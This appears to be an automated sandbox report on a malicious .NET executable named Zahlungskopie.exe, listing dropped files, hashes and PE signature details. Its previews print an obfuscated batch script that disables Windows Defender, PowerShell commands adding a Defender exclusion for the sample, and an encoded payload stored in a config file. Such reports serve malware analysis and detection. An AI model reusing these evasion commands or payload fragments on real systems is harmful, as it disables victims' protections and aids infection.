                                                                                                                                                                                                                        Preview: p...... .........j.y....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\EyZTsSvYLRhPfexadI\Zahlungskopie.exe_Url_zqqzfjdjk0smwfdoeqe34myf304yymrv\8.417.419.740\1mkqjldz.newcfg
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1985591
                                                                                                                                                                                                                        Entropy (8bit):3.026240702227183
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:H6bxmA9eM7UFCXxOzWc9I0R6+Z8YtitMw2sv7UUiwo:abxmA9rQsSB6+Z84i20TUX
                                                                                                                                                                                                                        MD5:DEC33882BBF485523E1D78F7E713168F
                                                                                                                                                                                                                        SHA1:CBAA8ED27C4914183FB52527BFCC0AC20727958F
                                                                                                                                                                                                                        SHA-256:D3A41452286EAAF4A96902FC82A744F1AD3123ED2BAE7DC2DA96990DDDAF7009
                                                                                                                                                                                                                        SHA-512:08A14FA38CFFCF671EEB948F5BB794FE6C560BE5371BAB5045CEC31AAD035B07459A170E301FBCC0B7C3C5F83505509682EADB34B2770ACE6D524EA9382CDDE5
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="EyZTsSvYLRhPfexadI.KHzUCwMEcEcAVMVeAPJOwQpV" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <EyZTsSvYLRhPfexadI.KHzUCwMEcEcAVMVeAPJOwQpV>.. <setting name="JwUhkAmOXyuAtbTFmVyEsoAEpicJwRVxyfZoxcaIMYWunpQu".. serializeAs="String">.. <value>77k90k144k0k3k0k0k0k4k0k0k0k255k255k0k0k184k0k0k0k0k0k0k0k64k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k0k128k0k0k0k14k31k186k14k0k180k9k205k33k184k1k76k205k33k84k104k105k115k32k112k114k111k103k114k97
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zahlungskopie.exe.log
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                                        Entropy (8bit):5.355304211458859
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14734
                                                                                                                                                                                                                        Entropy (8bit):4.996142136926143
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                                                                                                                                        MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                                                                                                                                        SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                                                                                                                                        SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                                                                                                                                        SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22324
                                                                                                                                                                                                                        Entropy (8bit):5.602614110493615
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:gtCD+0YUCZADCFP4KnAjultIo3D7Y9g9SJUeRa1BMrmWZSRV7Oawrzy564I+Nzz:nyAY4KACltp339Xeh3AVHr
                                                                                                                                                                                                                        MD5:1C5BB11EC1B1429F4BE5761C594581DE
                                                                                                                                                                                                                        SHA1:96CF7F5DE649E0D86346F853FD2DDE77B0523A2A
                                                                                                                                                                                                                        SHA-256:10D234AE62AEF17D77B5D284F89AC1517522269BA80A131379B94E88A75B45FB
                                                                                                                                                                                                                        SHA-512:29B08B802FFFE1703AEAEEB5AF651A69879E98927D3064CBF61B50E00C45EA1C32AAD448CF5026FDFA6444946870A004DC2CC7A81FE652FF7659D0CD9EEA2185
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: @...e.....................2...........&.2............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):91000
                                                                                                                                                                                                                        Entropy (8bit):6.241345766746317
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                                                                                                        MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                                                                        SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                                                                                                        SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                                                                                                        SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Reversing Purchase Orders.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: NEW ORDERS 122020 2 x 40 HQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ORDER01032021rfggfscan.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: FedEx's AWB#5305323204643.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: believehot23 cccc.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: order confirmation 6026022001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: RFQ - REF 208056-pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8399
                                                                                                                                                                                                                        Entropy (8bit):4.665734428420432
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                                                                                                        MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                                                                                                        SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                                                                                                        SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                                                                                                        SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qwedbya.jwe.psm1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kf03xesh.rdf.ps1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oivzv4c1.h2i.psm1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqe23g4a.ro0.ps1
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 1
                                                                                                                                                                                                                        C:\Users\user\Documents\20210302\PowerShell_transcript.301389.OVizGZCQ.20210302200916.txt
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5797
                                                                                                                                                                                                                        Entropy (8bit):5.381074682720349
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:BZvj2NptqDo1ZQZsj2NptqDo1ZcR/JjZbj2NptqDo1Z9VQZZuZR:0OR5x
                                                                                                                                                                                                                        MD5:DDA723C89BED6423DA7090D77D9FD9F7
                                                                                                                                                                                                                        SHA1:2EF6A33FE2E76634D3DD50C127E069E8F257A705
                                                                                                                                                                                                                        SHA-256:B7E5CAABF6CAEEF5D8F99E91CEF44F3E13D67CB5563FDD916D80346C7B9DC3C7
                                                                                                                                                                                                                        SHA-512:C392C42A2F1239223C26E6C3EC6EC2FF7DA25C5AC45235CDBE4F894B57DB8971FCECB7D1DDC1397A9CDBD5CC953D46BF3BD3DF6DADD621D921154471D9B0CE26
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210302200935..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210302200936..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210302201724..Username: computer\user..RunAs User: computer\
                                                                                                                                                                                                                        C:\Users\user\Documents\20210302\PowerShell_transcript.301389.Qg0nbofL.20210302200918.txt
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5797
                                                                                                                                                                                                                        Entropy (8bit):5.381809413245628
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:BZrj2NqqDo1ZtZCj2NqqDo1ZuR/JjZsj2NqqDo1Z0QZZbZE:X
                                                                                                                                                                                                                        MD5:1EB29D52CC7A77F0DB44D60C8D798528
                                                                                                                                                                                                                        SHA1:CC9A83380C8AC7BD9EED49B75A692573D126274C
                                                                                                                                                                                                                        SHA-256:2F2CE840608BCAA6862CF4ECC034F456A33C87349A772942A6D5A9BCC70BA54F
                                                                                                                                                                                                                        SHA-512:C35AB13DFC98F64DDDAEF3604CAEBF67F1FA3E4292D980AAC6E261BD931D592A231CE685AA44FDF9AE32137B573CEB87B95394C8C2DA9BC505C729AFCC34C827
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210302200939..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..Process ID: 6884..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210302200939..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Zahlungskopie.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210302201537..Username: computer\user..RunAs User: computer\

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.030954981769071
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        File name:Zahlungskopie.exe
                                                                                                                                                                                                                        File size:29744
                                                                                                                                                                                                                        MD5:9615a1c5bc0707a4248b1f138b834c2e
                                                                                                                                                                                                                        SHA1:ff9de956805883e95f6c2e17690ed64093875f74
                                                                                                                                                                                                                        SHA256:09ed9ccee27444a684fb38f7137ab2328963596a5e679acee296210e0c1c15a1
                                                                                                                                                                                                                        SHA512:0370a78f2868d15a41946a89956a85a9efcfbeeef12aef0745d8052d14f10f9c4cb334cd674279d8839e1b29c6843aa6afc4ceee0ecf2f5ec5e9b83c272382a4
                                                                                                                                                                                                                        SSDEEP:768:0tshM4WBZuFjjxuA+fNNe/Esh20x2V1cpaFghr:0FBZAj0lf+cE2SIcpa2
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^............"...0..X...........v... ........@.. ...............................+....@................................

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x40769e
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                        Time Stamp:0x80B55EFB [Sat Jun 5 16:59:39 2038 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                        Signature Issuer:C=MRUnfymTgABlcbqHSrCcoaSr, S=McVSwPjbBStKV, L=NMhqFdxzmaw, T=elGjgPiQwGkXnuMTJwDoiHzDonstGufrDzacOjyQWOtc, E=JYpnZMkZnKZCdzNUcBj, OU=QnVSzRZnUxfhZteNDm, O=TOfWKxitJGWDFEcbYZCHM, CN=MovAhCGmTSAXghJXFIOFRNbAdbuG
                                                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                        • 3/1/2021 10:09:50 PM 3/1/2022 10:09:50 PM
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                        • C=MRUnfymTgABlcbqHSrCcoaSr, S=McVSwPjbBStKV, L=NMhqFdxzmaw, T=elGjgPiQwGkXnuMTJwDoiHzDonstGufrDzacOjyQWOtc, E=JYpnZMkZnKZCdzNUcBj, OU=QnVSzRZnUxfhZteNDm, O=TOfWKxitJGWDFEcbYZCHM, CN=MovAhCGmTSAXghJXFIOFRNbAdbuG
                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                        Thumbprint MD5:8E91EE92D8C46CBDDD6EC5F516EA7572
                                                                                                                                                                                                                        Thumbprint SHA-1:84016644B7C78D56A2EA24DD0015CB5AFA45C7D1
                                                                                                                                                                                                                        Thumbprint SHA-256:8875CAA77FF77F78538385F9F28B5614114B87DDC810B62AFB6F715572B2214D
                                                                                                                                                                                                                        Serial:1A4ED61549096655F37512FF8DC43759

